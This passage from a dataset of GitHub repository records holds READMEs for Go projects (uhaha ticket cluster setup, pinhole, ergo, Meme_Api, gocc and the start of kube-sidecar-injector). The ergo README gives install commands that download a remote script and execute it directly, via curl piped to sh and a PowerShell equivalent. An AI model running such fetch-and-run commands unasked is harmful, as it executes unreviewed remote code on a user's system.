auth.\n\n```sh\n./ticket -n 2 -a 10.0.0.2:11001 --auth my-secret -j 10.0.0.1:11001\n```\n\n```sh\n./ticket -n 2 -a 10.0.0.3:11001 --auth my-secret -j 10.0.0.1:11001\n```\n\nThe client will also need the same auth to talk with cluster. All redis clients support an auth password, such as:\n\n```sh\nredis-cli -h 10.0.0.1 -p 11001 -a my-secret\n```\n\nThis may be enough if you keep all your machines on the same private network, but you don't want all machines or applications to have unfettered access to the cluster.\n\n### TLS\n\nFinally you can use TLS, which I recommend along with an auth password.\n\nIn this example a custom cert and key are created using the [`mkcert`](https://github.com/FiloSottile/mkcert) tool.\n\n```sh\nmkcert uhaha-example\n# produces uhaha-example.pem, uhaha-example-key.pem, and a rootCA.pem\n```\n\nThen create a cluster using the cert & key files. Along with an auth.\n\n```sh\n./ticket -n 1 -a 10.0.0.1:11001 --tls-cert uhaha-example.pem --tls-key uhaha-example-key.pem --auth my-secret\n```\n\n```sh\n./ticket -n 2 -a 10.0.0.2:11001 --tls-cert uhaha-example.pem --tls-key uhaha-example-key.pem --auth my-secret -j 10.0.0.1:11001\n```\n\n```sh\n./ticket -n 2 -a 10.0.0.3:11001 --tls-cert uhaha-example.pem --tls-key uhaha-example-key.pem --auth my-secret -j 10.0.0.1:11001\n```\n\nNow you can connect to the server from a client that has the `rootCA.pem`. \nYou can find the location of your rootCA.pem file in the running `ls \"$(mkcert -CAROOT)/rootCA.pem\"`.\n\n```sh\nredis-cli -h 10.0.0.1 -p 11001 --tls --cacert rootCA.pem -a my-secret\n```\n\n## Command-line options\n\nBelow are all of the command line options.\n\n```\nUsage: my-uhaha-app [-n id] [-a addr] [options]\n\nBasic options:\n -v : display version\n -h : display help, this screen\n -a addr : bind to address (default: 127.0.0.1:11001)\n -n id : node ID (default: 1)\n -d dir : data directory (default: data)\n -j addr : leader address of a cluster to join\n -l level : log level (default: info) [debug,verb,info,warn,silent]\n\nSecurity options:\n --tls-cert path : path to TLS certificate\n --tls-key path : path to TLS private key\n --auth auth : cluster authorization, shared by all servers and clients\n\nNetworking options:\n --advertise addr : advertise address (default: network bound address)\n\nAdvanced options:\n --nosync : turn off syncing data to disk after every write. This leads\n to faster write operations but opens up the chance for data\n loss due to catastrophic events such as power failure.\n --openreads : allow followers to process read commands, but with the\n possibility of returning stale data.\n --localtime : have the raft machine time synchronized with the local\n server rather than the public internet. This will run the\n risk of time shifts when the local server time is\n drastically changed during live operation.\n --restore path : restore a raft machine from a snapshot file. This will\n start a brand new single-node cluster using the snapshot as\n initial data. The other nodes must be re-joined. This\n operation is ignored when a data directory already exists.\n Cannot be used with -j flag.\n```\n\n\n\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tidwall/pinhole", "link": "https://github.com/tidwall/pinhole", "tags": ["graphics"], "stars": 553, "description": "3D Wireframe Drawing Library for Go", "lang": "Go", "repo_lang": "", "readme": "# `pinhole`\n\n\"GoDoc\"\n\n3D Wireframe Drawing Library for Go\n\n[Javascript Version](https://github.com/tidwall/pinhole-js) \n[Demo](https://tidwall.com/pinhole/)\n\n\n\"earth\"\"shapes\"\n\"spiral\"\"gopher\"\n\n## Why does this exist?\n\nI needed a CPU based 3D rendering library with a very simple API for visualizing data structures. No bells or whistles, just clean lines and solid colors.\n\n## Getting Started\n\n### Installing\n\nTo start using `pinhole`, install Go and run `go get`:\n\n```sh\n$ go get -u github.com/tidwall/pinhole\n```\n\nThis will retrieve the library.\n\n### Using\n\nThe coordinate space has a locked origin of `0,0,0` with the min/max boundaries of `-1,-1,-1` to `+1,+1,+1`.\nThe `Z` coordinate extends from `-1` (nearest) to `+1` (farthest).\n\nThere are four types of shapes; `line`, `cube`, `circle`, and `dot`. \nThese can be transformed with the `Scale`, `Rotate`, and `Translate` functions.\nMultiple shapes can be transformed by nesting in a `Begin/End` block.\n\n\nA simple cube:\n\n```go\np := pinhole.New()\np.DrawCube(-0.3, -0.3, -0.3, 0.3, 0.3, 0.3)\np.SavePNG(\"cube.png\", 500, 500, nil)\n```\n\n\n\n\nRotate the cube:\n\n```go\np := pinhole.New()\np.DrawCube(-0.3, -0.3, -0.3, 0.3, 0.3, 0.3)\np.Rotate(math.Pi/3, math.Pi/6, 0)\np.SavePNG(\"cube.png\", 500, 500, nil)\n```\n\n\n\nAdd, rotate, and transform a circle:\n\n```go\np := pinhole.New()\np.DrawCube(-0.3, -0.3, -0.3, 0.3, 0.3, 0.3)\np.Rotate(math.Pi/3, math.Pi/6, 0)\n\np.Begin()\np.DrawCircle(0, 0, 0, 0.2)\np.Rotate(0, math.Pi/2, 0)\np.Translate(-0.6, -0.4, 0)\np.Colorize(color.RGBA{255, 0, 0, 255})\np.End()\n\np.SavePNG(\"cube.png\", 500, 500, nil)\n```\n\n\n\n## Contact\n\nJosh Baker [@tidwall](http://twitter.com/tidwall)\n\n## License\n\n`pinhole` source code is available under the ISC [License](/LICENSE).\n\n", "readme_type": "markdown", "hn_comments": "good library!Is it weird that I saw this and the first thing I wanted to see it used for was a browser port of Elite?the code seems to be at https://github.com/tidwall/pinhole-js in case anyone else needs to take a look.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cristianoliveira/ergo", "link": "https://github.com/cristianoliveira/ergo", "tags": ["proxy", "tools", "golang", "proxy-server", "development", "development-environment", "developer-tools", "ergo", "reverse-proxy", "osx", "linux", "windows", "web-proxy", "microservices", "distributed-systems"], "stars": 553, "description": "The management of multiple apps running over different ports made easy", "lang": "Go", "repo_lang": "", "readme": "\n# Ergo [![GoDoc](https://godoc.org/github.com/cristianoliveira/ergo?status.svg)](https://godoc.org/github.com/cristianoliveira/ergo) [![Go Report Card](https://goreportcard.com/badge/github.com/cristianoliveira/ergo)](https://goreportcard.com/report/github.com/cristianoliveira/ergo) [![unix build](https://img.shields.io/travis/cristianoliveira/ergo.svg?label=unix)](https://travis-ci.org/cristianoliveira/ergo) [![win build](https://img.shields.io/appveyor/ci/cristianoliveira/ergo.svg?label=win)](https://ci.appveyor.com/project/cristianoliveira/ergo) [![codecov](https://codecov.io/gh/cristianoliveira/ergo/branch/master/graph/badge.svg)](https://codecov.io/gh/cristianoliveira/ergo)\n\n

\n\nErgo Proxy - The reverse proxy agent for local domain management.\n\n

\n\n

\n The management of multiple apps running over different ports made easy through custom local domains.\n

\n\n## Demo\n\n\n\nSee more on [examples](https://github.com/cristianoliveira/ergo/tree/master/examples)\n\n## Summary\n* [Philosophy](#philosophy)\n* [Installation](#installation)\n - [osx](#osx)\n - [linux](#linux)\n - [windows](#windows)\n* [Usage](#usage)\n* [Configuration](#configuration)\n* [Testing](#run-tests)\n* [Contributing](#contributing)\n\n### Philosophy\n\nErgo's goal is to be a simple reverse proxy that follows the [Unix philosophy](https://en.wikipedia.org/wiki/Unix_philosophy) of doing only one thing and doing it well. Simplicity means no magic involved. Just a flexible reverse proxy which extends the well-known `/etc/hosts` declaration.\n\n**Feedback**\n\nThis project is constantly undergoing development, however, it's ready to use. Feel free to provide\nfeedback as well as open issues. All suggestions and contributions are welcome. :)\n\nFor help and feedback you can find us at #ergo-proxy channel on https://gopher.slack.com\n\n## Why?\n\nDealing with multiple apps locally, and having to remember each port representing each microservice is frustrating. I wanted a simple way to assign each service a proper local domain. Ergo solves this problem.\n\n## Installation\n\n**Important** These are the only official ways to install ergo.\n\n### OSX\n```\nbrew tap cristianoliveira/tap\nbrew install ergo\n```\n\n### Linux\n```\ncurl -s https://raw.githubusercontent.com/cristianoliveira/ergo/master/install.sh | sh\n```\n\n### Windows\n\nFrom powershell run:\n\n```\nInvoke-WebRequest https://raw.githubusercontent.com/cristianoliveira/ergo/master/install.ps1 -out ./install.ps1; ./install.ps1\n```\n\n_You can also find the Windows executables in [release](https://github.com/cristianoliveira/ergo/releases)._\n\n***Disclaimer:***\nI use Unix-based systems on a daily basis, so I am not able to test each build alone. :(\n\n### Go\n```\ngo install github.com/cristianoliveira/ergo\n```\nMake sure you have `$GOPATH/bin` in your path: `export PATH=$PATH:$GOPATH/bin`\n\n## Usage\n\nErgo looks for a `.ergo` file inside the current directory. It must contain the names and URL of the services following the same format as `/etc/hosts` (`domain`+`space`+`url`). The main difference is it also considers the specified port.\n\n### Simplest Setup\n\n**You need to set the `http://127.0.0.1:2000/proxy.pac` configuration on your system network config.**\n\nErgo comes with a setup command that can configure it for you. The current systems supported are:\n\n - osx\n - linux-gnome\n - windows\n\n```bash\nergo setup \n```\n\nIn case of errors / it doesn't work, please look at the detailed config session below.\n\n### Adding Services and Running\n\n#### OS X / Linux\n```\necho \"ergoproxy http://localhost:3000\" > .ergo\nergo run\n```\n\nNow you should be able to access: `http://ergoproxy.dev`.\nErgo redirects anything ending with `.dev` to the configured url.\n\n#### Windows\nYou should not use the default `.dev` domain, we suggest `.test` instead (see [#58](https://github.com/cristianoliveira/ergo/issues/58)) unless your service supports https out of the box and you have already a certificate\n```\nset ERGO_DOMAIN=.test\necho ergoproxy http://localhost:3000 > .ergo\nergo list # you shouldn't see any quotas in the output\nergo run\n```\nNow you should be able to access: `http://ergoproxy.test`.\nErgo redirects anything ending with `.test` to the configured url.\n\nSimple, right? No magic involved.\n\nDo you want to add more services? It's easy, just add more lines in `.ergo`:\n```\necho \"otherservice http://localhost:5000\" >> .ergo\nergo list\nergo run\n```\n\nRestart the ergo server and access: `http://otherservice.dev`\n\n`ergo add otherservice http://localhost:5000` is a shorthand for appending lines to `./.ergo`\n\n### Ergo's configuration\n\nErgo accepts different configurations like run in different `port` (default: 2000) and change `domain` (default: dev). You can find all this configs on ergo's help running `ergo -h`.\n\n## Configuration\n\nIn order to use Ergo domains you need to set it as a proxy. Set the `http://127.0.0.1:2000/proxy.pac` on:\n\n### Networking Web Proxy\n\n#### OS X\n\n`Network Preferences > Advanced > Proxies > Automatic Proxy Configuration`\n\n#### Windows\n\n`Settings > Network and Internet > Proxy > Use setup script`\n\n#### Linux\n\nOn Ubuntu\n\n`System Settings > Network > Network Proxy > Automatic`\n\nFor other distributions, check your network manager and look for proxy configuration. Use browser configuration as an alternative.\n\n### Browser configuration\n\nBrowsers can be configured to use a specific proxy. Use this method as an alternative to system-wide configuration.\n\nKeep in mind that if you requested the site before setting the proxy properly, you have to reset the cache of the browser or change the name of the service. In `incognito` windows cache is disabled by default, so you can use them if you don't wish to delete the cache\n\nAlso you should not use the default `.dev` domain, we suggest `.test` instead (see [#58](https://github.com/cristianoliveira/ergo/issues/58)) unless your service supports https out of the box and you have already a certificate\n\n#### Chrome\n\nExit Chrome and start it using the following option:\n\n```sh\n# Linux\n$ google-chrome --proxy-pac-url=http://localhost:2000/proxy.pac\n\n# OS X\n$ open -a \"Google Chrome\" --args --proxy-pac-url=http://localhost:2000/proxy.pac\n```\n\n#### Firefox\n\n##### through menus and mouse\n1. Click the hamburger button otherwise click on \"Edit\" Menu\n1. then \"Preferences\"\n1. then \"Settings\" button at the bottom of the page (\"General\" active in sidebar) with title \"Network Settings\"\n1. check `Automatic Proxy configuration URL` and enter value `http://localhost:2000/proxy.pac` below\n1. hit \"ok\"\n\n\n##### from about:config\n`network.proxy.autoconfig_url` -> `http://localhost:2000/proxy.pac`\n\n\n### Using on terminal\n\nIn order to use ergo as your web proxy on terminal you must set the `http_proxy` variable. (Only for linux/osx)\n\n```sh\nexport http_proxy=\"http://localhost:2000\"\n```\n\n### Ephemeral Setup\n\nAs an alternative you can see the scripts inside `/resources` for running an\nephemeral setup. Those scripts set the proxy only while `ergo` is running.\n\n## Contributing\n - Fork it!\n - Create your feature branch: `git checkout -b my-new-feature`\n - Commit your changes: `git commit -am 'Add some feature'`\n - Push to the branch: `git push origin my-new-feature`\n - Submit a pull request, they are welcome!\n - Please include unit tests in your pull requests\n\n## Development\n\nMinimal required golang version `go1.17.6`.\nWe recommend using [GVM](https://github.com/moovweb/gvm) for managing\nyour go versions.\n\nThen simply run:\n```sh\ngvm use $(cat .gvmrc)\n```\n\n### Building\n\n```sh\n make all\n```\n\n## Testing\n\n ```sh\n make test\n make test-integration # Requires admin permission so use it carefully.\n```\n\n# License\n\nMIT\n", "readme_type": "markdown", "hn_comments": "If it meets the guidelines, this might make a good 'Show HN'. Show HN guidelines: https://news.ycombinator.com/showhn.html", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "D3vd/Meme_Api", "link": "https://github.com/D3vd/Meme_Api", "tags": ["reddit", "meme", "memes", "meme-api", "api"], "stars": 553, "description": "Summon a random meme at will", "lang": "Go", "repo_lang": "", "readme": "# Meme API\r\n\r\n\u26a0\ufe0f Heroku has discontinued support for free Dynos, so the old Domain `meme-api.herokuapp.com` has stopped working \u26a0\ufe0f\r\n\r\nPlease update your apps to the new Domain `meme-api.com` to continue using the API\r\n\r\n[![CodeFactor](https://www.codefactor.io/repository/github/d3vd/meme_api/badge)](https://www.codefactor.io/repository/github/d3vd/meme_api)\r\n[![Codacy Badge](https://app.codacy.com/project/badge/Grade/8df2a02ea3294423adc74bbf0a13356e)](https://www.codacy.com/gh/D3vd/Meme_Api/dashboard?utm_source=github.com&utm_medium=referral&utm_content=D3vd/Meme_Api&utm_campaign=Badge_Grade)\r\n[![DeepSource](https://deepsource.io/gh/D3vd/Meme_Api.svg/?label=active+issues&show_trend=true)](https://deepsource.io/gh/D3vd/Meme_Api/?ref=repository-badge)\r\n\r\nJSON API for a random meme scraped from reddit.\r\n\r\nAPI Link : [https://meme-api.com/gimme](https://meme-api.com/gimme)\r\n\r\n**Example Response:**\r\n\r\n```jsonc\r\n{\r\n \"postLink\": \"https://redd.it/jiovfz\",\r\n \"subreddit\": \"dankmemes\",\r\n \"title\": \"*leaves call*\",\r\n \"url\": \"https://i.redd.it/f7ibqp1dmiv51.gif\",\r\n \"nsfw\": false,\r\n \"spoiler\": false,\r\n \"author\": \"Spartan-Yeet\",\r\n \"ups\": 3363,\r\n\r\n // preview images of the meme sorted from lowest to highest quality\r\n \"preview\": [\r\n \"https://preview.redd.it/f7ibqp1dmiv51.gif?width=108&crop=smart&format=png8&s=02b12609100c14f55c31fe046f413a9415804d62\",\r\n \"https://preview.redd.it/f7ibqp1dmiv51.gif?width=216&crop=smart&format=png8&s=8da35457641a045e88e42a25eca64c14a6759f82\",\r\n \"https://preview.redd.it/f7ibqp1dmiv51.gif?width=320&crop=smart&format=png8&s=f2250b007b8252c7063b8580c2aa72c5741766ae\",\r\n \"https://preview.redd.it/f7ibqp1dmiv51.gif?width=640&crop=smart&format=png8&s=6cd99df5e58c976bc115bd080a1e6afdbd0d71e7\"\r\n ]\r\n}\r\n```\r\n\r\n## Custom Endpoints\r\n\r\n### Specify count (MAX 50)\r\n\r\nIn order to get multiple memes in a single request specify the count with the following endpoint.\r\n\r\nEndpoint: [/gimme/{count}](https://meme-api.com/gimme/2)\r\n\r\nExample: [https://meme-api.com/gimme/2](https://meme-api.com/gimme/2)\r\n\r\nResponse:\r\n\r\n```jsonc\r\n{\r\n \"count\": 2,\r\n \"memes\": [\r\n {\r\n \"postLink\": \"https://redd.it/jictqq\",\r\n \"subreddit\": \"dankmemes\",\r\n \"title\": \"Say sike\",\r\n \"url\": \"https://i.redd.it/j6wu6o9ncfv51.gif\",\r\n \"nsfw\": false,\r\n \"spoiler\": false,\r\n \"author\": \"n1GG99\",\r\n \"ups\": 72823,\r\n \"preview\": [\r\n \"https://preview.redd.it/j6wu6o9ncfv51.gif?width=108&crop=smart&format=png8&s=3b110a4d83a383b7bfebaf09ea60d89619cddfb3\",\r\n \"https://preview.redd.it/j6wu6o9ncfv51.gif?width=216&crop=smart&format=png8&s=ba5808992b3245a6518dfe759cbe4af24e042f2d\",\r\n \"https://preview.redd.it/j6wu6o9ncfv51.gif?width=320&crop=smart&format=png8&s=7567bb64e639223e3603236f774eeca149551313\"\r\n ]\r\n },\r\n {\r\n \"postLink\": \"https://redd.it/jilgdw\",\r\n \"subreddit\": \"dankmemes\",\r\n \"title\": \"I forgot how hard it is to think of a title\",\r\n \"url\": \"https://i.redd.it/jk12rq8nrhv51.jpg\",\r\n \"nsfw\": false,\r\n \"spoiler\": false,\r\n \"author\": \"TheRealKyJoe01\",\r\n \"ups\": 659,\r\n \"preview\": [\r\n \"https://preview.redd.it/jk12rq8nrhv51.jpg?width=108&crop=smart&auto=webp&s=d5d3fe588ccff889e61fca527c2358e429845b80\",\r\n \"https://preview.redd.it/jk12rq8nrhv51.jpg?width=216&crop=smart&auto=webp&s=b560b78301afd8c173f8c702fbd791214c1d7f61\",\r\n \"https://preview.redd.it/jk12rq8nrhv51.jpg?width=320&crop=smart&auto=webp&s=3cd427240b2185a3691a818774214fd2a0de124d\",\r\n \"https://preview.redd.it/jk12rq8nrhv51.jpg?width=640&crop=smart&auto=webp&s=1142cc19a746b8b5d8335679d1d36127f4a677b9\"\r\n ]\r\n }\r\n ]\r\n}\r\n```\r\n\r\n### Specify Subreddit\r\n\r\nBy default the API grabs a random meme from '_memes_', '_dankmemes_', '_me_irl_' subreddits. To provide your own custom subreddit use the following endpoint.\r\n\r\nEndpoint: [/gimme/{subreddit}](https://meme-api.com/gimme/wholesomememes)\r\n\r\nExample: [https://meme-api.com/gimme/wholesomememes](https://meme-api.com/gimme/wholesomememes)\r\n\r\nResponse:\r\n\r\n```json\r\n{\r\n \"postLink\": \"https://redd.it/jhr5lf\",\r\n \"subreddit\": \"wholesomememes\",\r\n \"title\": \"Every time I visit\",\r\n \"url\": \"https://i.redd.it/hsyyeb87v7v51.jpg\",\r\n \"nsfw\": false,\r\n \"spoiler\": false,\r\n \"author\": \"pak_choy\",\r\n \"ups\": 1660,\r\n \"preview\": [\r\n \"https://preview.redd.it/hsyyeb87v7v51.jpg?width=108&crop=smart&auto=webp&s=b76ddb91f212b2e304cad2cd9c5b71a6ddca832c\",\r\n \"https://preview.redd.it/hsyyeb87v7v51.jpg?width=216&crop=smart&auto=webp&s=2bd0b104fd0825afc15d9faa7977c6801e6dae0b\",\r\n \"https://preview.redd.it/hsyyeb87v7v51.jpg?width=320&crop=smart&auto=webp&s=7625c69e144c9cb187dd0be88f541918aca5cedd\",\r\n \"https://preview.redd.it/hsyyeb87v7v51.jpg?width=640&crop=smart&auto=webp&s=e933f956e01d62810e68f12ed8b26a8178ecbb0f\"\r\n ]\r\n}\r\n```\r\n\r\n### Specify Subreddit Count (MAX 50)\r\n\r\nIn order to get a custom number of memes from a specific subreddit provide the name of the subreddit and the count in the following endpoint.\r\n\r\nEndpoint: [/gimme/{subreddit}/{count}](https://meme-api.com/gimme/wholesomememes/2)\r\n\r\nExample: [https://meme-api.com/gimme/wholesomememes/2](https://meme-api.com/gimme/wholesomememes/2)\r\n\r\nResponse:\r\n\r\n```json\r\n{\r\n \"count\": 2,\r\n \"memes\": [\r\n {\r\n \"postLink\": \"https://redd.it/ji1riw\",\r\n \"subreddit\": \"wholesomememes\",\r\n \"title\": \"It makes me feel good.\",\r\n \"url\": \"https://i.redd.it/xuzd77yl8bv51.png\",\r\n \"nsfw\": false,\r\n \"spoiler\": false,\r\n \"author\": \"polyesterairpods\",\r\n \"ups\": 306,\r\n \"preview\": [\r\n \"https://preview.redd.it/xuzd77yl8bv51.png?width=108&crop=smart&auto=webp&s=9a0376741fbda988ceeb7d96fdec3982f102313e\",\r\n \"https://preview.redd.it/xuzd77yl8bv51.png?width=216&crop=smart&auto=webp&s=ee2f287bf3f215da9c1cd88c865692b91512476d\",\r\n \"https://preview.redd.it/xuzd77yl8bv51.png?width=320&crop=smart&auto=webp&s=88850d9155d51f568fdb0ad527c94d556cd8bd70\",\r\n \"https://preview.redd.it/xuzd77yl8bv51.png?width=640&crop=smart&auto=webp&s=b7418b023b2f09cdc189a55ff1c57d531028bc3e\"\r\n ]\r\n },\r\n {\r\n \"postLink\": \"https://redd.it/jibifc\",\r\n \"subreddit\": \"wholesomememes\",\r\n \"title\": \"It really feels like that\",\r\n \"url\": \"https://i.redd.it/vvpbl29prev51.jpg\",\r\n \"nsfw\": false,\r\n \"spoiler\": false,\r\n \"author\": \"lolthebest\",\r\n \"ups\": 188,\r\n \"preview\": [\r\n \"https://preview.redd.it/vvpbl29prev51.jpg?width=108&crop=smart&auto=webp&s=cf64f01dfaca5f41c2e87651e4b0e321e28fa47c\",\r\n \"https://preview.redd.it/vvpbl29prev51.jpg?width=216&crop=smart&auto=webp&s=33acdf7ed7d943e1438039aa71fe9295ee2ff5a0\",\r\n \"https://preview.redd.it/vvpbl29prev51.jpg?width=320&crop=smart&auto=webp&s=6a0497b998bd9364cdb97876aa54c147089270da\",\r\n \"https://preview.redd.it/vvpbl29prev51.jpg?width=640&crop=smart&auto=webp&s=e68fbe686e92acb5977bcfc24dd57febd552afaf\",\r\n \"https://preview.redd.it/vvpbl29prev51.jpg?width=960&crop=smart&auto=webp&s=1ba690cfe8d49480fdd55c6daee6f2692e9292e7\",\r\n \"https://preview.redd.it/vvpbl29prev51.jpg?width=1080&crop=smart&auto=webp&s=44852004dba921a17ee4ade108980baab242805e\"\r\n ]\r\n }\r\n ]\r\n}\r\n```\r\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "goccmack/gocc", "link": "https://github.com/goccmack/gocc", "tags": [], "stars": 553, "description": "Parser / Scanner Generator", "lang": "Go", "repo_lang": "", "readme": "# New\nHave a look at [https://github.com/goccmack/gogll](https://github.com/goccmack/gogll) for scannerless GLL parser generation.\n# Gocc\n\n![Build Status](https://github.com/goccmack/gocc/workflows/build/badge.svg)\n[![go.dev reference](https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white&style=flat-square)](https://pkg.go.dev/github.com/goccmack/gocc)\n[![Go Report Card](https://goreportcard.com/badge/github.com/goccmack/gocc)](https://goreportcard.com/report/github.com/goccmack/gocc)\n\n## Introduction\n\nGocc is a compiler kit for Go written in Go.\n\nGocc generates lexers and parsers or stand-alone DFAs or parsers from a BNF.\n\nLexers are DFAs, which recognise regular languages. Gocc lexers accept UTF-8 input.\n\nGocc parsers are PDAs, which recognise LR-1 languages. Optional LR1 conflict\nhandling automatically resolves shift / reduce and reduce / reduce conflicts.\n\nGenerating a lexer and parser starts with creating a bnf file. Action expressions\nembedded in the BNF allows the user to specify semantic actions for syntax productions.\n\nFor complex applications the user typically uses an abstract syntax tree (AST)\nto represent the derivation of the input. The user provides a set of functions\nto construct the AST, which are called from the action expressions specified\nin the BNF.\n\nSee the [README](example/bools/README) for an included example.\n\n[User Guide (PDF): Learn You a gocc for Great Good](https://raw.githubusercontent.com/goccmack/gocc/master/doc/gocc_user_guide.pdf) (gocc3 user guide will be published shortly)\n\n## Installation\n\n* First download and Install Go From http://golang.org/\n* Setup your GOPATH environment variable.\n* Next in your command line run: go get github.com/goccmack/gocc (go get will\n git clone gocc into GOPATH/src/github.com/goccmack/gocc and run go install)\n* Alternatively clone the source: https://github.com/goccmack/gocc . Followed\n by go install github.com/goccmack/gocc\n* Finally, make sure that the bin folder where the gocc binary is located is\n in your PATH environment variable.\n\n## Getting Started\n\nOnce installed, start by creating your BNF in a package folder.\n\nFor example GOPATH/src/foo/bar.bnf:\n\n```\n/* Lexical Part */\n\nid : 'a'-'z' {'a'-'z'} ;\n\n!whitespace : ' ' | '\\t' | '\\n' | '\\r' ;\n\n/* Syntax Part */\n\n<< import \"foo/ast\" >>\n\nHello: \"hello\" id << ast.NewWorld($1) >> ;\n```\n\nNext to use gocc, run:\n\n```sh\ncd $GOPATH/src/foo\ngocc bar.bnf\n```\n\nThis will generate a scanner, parser and token package inside GOPATH/src/foo\nFollowing times you might only want to run gocc without the scanner flag,\nsince you might want to start making the scanner your own. Gocc is after all\nonly a parser generator even if the default scanner is quite useful.\n\nNext create ast.go file at $GOPATH/src/foo/ast with the following contents:\n\n```go\npackage ast\n\nimport (\n \"foo/token\"\n)\n\ntype Attrib interface {}\n\ntype World struct {\n Name string\n}\n\nfunc NewWorld(id Attrib) (*World, error) {\n return &World{string(id.(*token.Token).Lit)}, nil\n}\n\nfunc (this *World) String() string {\n return \"hello \" + this.Name\n}\n```\n\nFinally, we want to parse a string into the ast, so let us write a test at\n$GOPATH/src/foo/test/parse_test.go with the following contents:\n\n```go\npackage test\n\nimport (\n \"foo/ast\"\n \"foo/lexer\"\n \"foo/parser\"\n \"testing\"\n)\n\nfunc TestWorld(t *testing.T) {\n input := []byte(`hello gocc`)\n lex := lexer.NewLexer(input)\n p := parser.NewParser()\n st, err := p.Parse(lex)\n if err != nil {\n panic(err)\n }\n w, ok := st.(*ast.World)\n if !ok {\n t.Fatalf(\"This is not a world\")\n }\n if w.Name != `gocc` {\n t.Fatalf(\"Wrong world %v\", w.Name)\n }\n}\n```\n\nFinally, run the test:\n\n```sh\ncd $GOPATH/src/foo/test\ngo test -v\n```\n\nYou have now created your first grammar with gocc. This should now be relatively\neasy to change into the grammar you actually want to create or use an existing\nLR1 grammar you would like to parse.\n\n## BNF\n\nThe Gocc BNF is specified [here](spec/gocc2.ebnf)\n\nAn example bnf with action expressions can be found [here](example/bools/example.bnf)\n\n## Action Expressions and AST\n\nAn action expression is specified as \"<\", \"<\", goccExpressionList , \">\", \">\" .\nThe goccExpressionList is equivalent to a [goExpressionList](https://golang.org/ref/spec#ExpressionList).\nThis expression list should return an Attrib and an error. Where Attrib is:\n\n```go\ntype Attrib interface {}\n```\n\nAlso, parsed elements of the corresponding bnf rule can be represented in the expressionList as \"$\", digit.\n\nSome action expression examples:\n\n```\n<< $0, nil >>\n<< ast.NewFoo($1) >>\n<< ast.NewBar($3, $1) >>\n<< ast.TRUE, nil >>\n```\n\nConstants, functions, etc. that are returned or called should be programmed by\nthe user in his ast (Abstract Syntax Tree) package. The ast package requires\nthat you define your own Attrib interface as shown above. All parameters\npassed to functions will be of this type.\n\nFor raw elements that you know to be a `*token.Token`, you can use the short-hand: `$T0` etc, leading the following expressions to produce identical results:\n\n```\n<< $3.(*token.Token), nil >>\n<< $T3, nil >>\n```\n\nSome example of functions:\n\n```go\nfunc NewFoo(a Attrib) (*Foo, error) { ... }\nfunc NewBar(a, b Attrib) (*Bar, error) { ... }\n```\n\nAn example of an ast can be found [here](example/bools/ast/ast.go)\n\n## Users\n\nThese projects use gocc:\n\n* [gogo](https://github.com/shivansh/gogo) - [BNF file](https://github.com/shivansh/gogo/blob/master/src/lang.bnf) - a Go to MIPS compiler written in Go\n* [gonum/gonum](https://github.com/gonum/gonum) - [BNF file](https://github.com/gonum/gonum/blob/master/graph/formats/dot/internal/dot.bnf) - DOT decoder (part of the graph library of Gonum)\n* [llir/llvm](https://github.com/llir/llvm) - [BNF file](https://github.com/llir/llvm/blob/28149269dab73cc63915a9c2c6c7b25dbd4db027/asm/internal/ll.bnf) - LLVM IR library in pure Go\n* [mewmew/uc](https://github.com/mewmew/uc) - [BNF file](https://github.com/mewmew/uc/blob/master/gocc/uc.bnf) - A compiler for the \u00b5C language\n* [gographviz](https://github.com/awalterschulze/gographviz) - [BNF file](https://github.com/awalterschulze/gographviz/blob/master/dot.bnf) - Parses the Graphviz DOT language in golang\n* [katydid/relapse](http://katydid.github.io/) - [BNF file](https://github.com/katydid/katydid/blob/master/relapse/bnf/all.bnf) - Encoding agnostic validation language\n* [skius/stringlang](https://github.com/skius/stringlang) - [BNF file](https://github.com/skius/stringlang/blob/main/lang.bnf) - An interpreter for the expression-oriented language StringLang\n* [miller](https://github.com/johnkerl/miller) - [BNF file](https://github.com/johnkerl/miller/blob/main/internal/pkg/parsing/mlr.bnf) - Miller is like awk, sed, cut, join, and sort for name-indexed data such as CSV, TSV, and tabular JSON.\n* [nesgo](https://github.com/retroenv/nesgo) - [BNF file](https://github.com/retroenv/nesgo/blob/main/internal/gocc/lang.bnf) - A Go compiler for NES\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "morvencao/kube-sidecar-injector", "link": "https://github.com/morvencao/kube-sidecar-injector", "tags": [], "stars": 553, "description": "A Kubernetes mutating webhook server that implements sidecar injection", "lang": "Go", "repo_lang": "", "readme": "# kube-sidecar-injector\n\nThis repo is used for [a tutorial at Medium](https://medium.com/ibm-cloud/diving-into-kubernetes-mutatingadmissionwebhook-6ef3c5695f74) to create a Kubernetes [MutatingAdmissionWebhook](https://kubernetes.io/docs/admin/admission-controllers/#mutatingadmissionwebhook-beta-in-19) that injects a nginx sidecar container into pod prior to persistence of the object.\n\n## Prerequisites\n\n- [git](https://git-scm.com/downloads)\n- [go](https://golang.org/dl/) version v1.17+\n- [docker](https://docs.docker.com/install/) version 19.03+\n- [kubectl](https://kubernetes.io/docs/tasks/tools/install-kubectl/) version v1.19+\n- Access to a Kubernetes v1.19+ cluster with the `admissionregistration.k8s.io/v1` API enabled. Verify that by the following command:\n\n```\nkubectl api-versions | grep admissionregistration.k8s.io\n```\nThe result should be:\n```\nadmissionregistration.k8s.io/v1\nadmissionregistration.k8s.io/v1beta1\n```\n\n> Note: In addition, the `MutatingAdmissionWebhook` and `ValidatingAdmissionWebhook` admission controllers should be added and listed in the correct order in the admission-control flag of kube-apiserver.\n\n## Build and Deploy\n\n1. Build and push docker image:\n\n```bash\nmake docker-build docker-push IMAGE=quay.io//sidecar-injector:latest\n```\n\n2. Deploy the kube-sidecar-injector to kubernetes cluster:\n\n```bash\nmake deploy IMAGE=quay.io//sidecar-injector:latest\n```\n\n3. Verify the kube-sidecar-injector is up and running:\n\n```bash\n# kubectl -n sidecar-injector get pod\n# kubectl -n sidecar-injector get pod\nNAME READY STATUS RESTARTS AGE\nsidecar-injector-7c8bc5f4c9-28c84 1/1 Running 0 30s\n```\n\n## How to use\n\n1. Create a new namespace 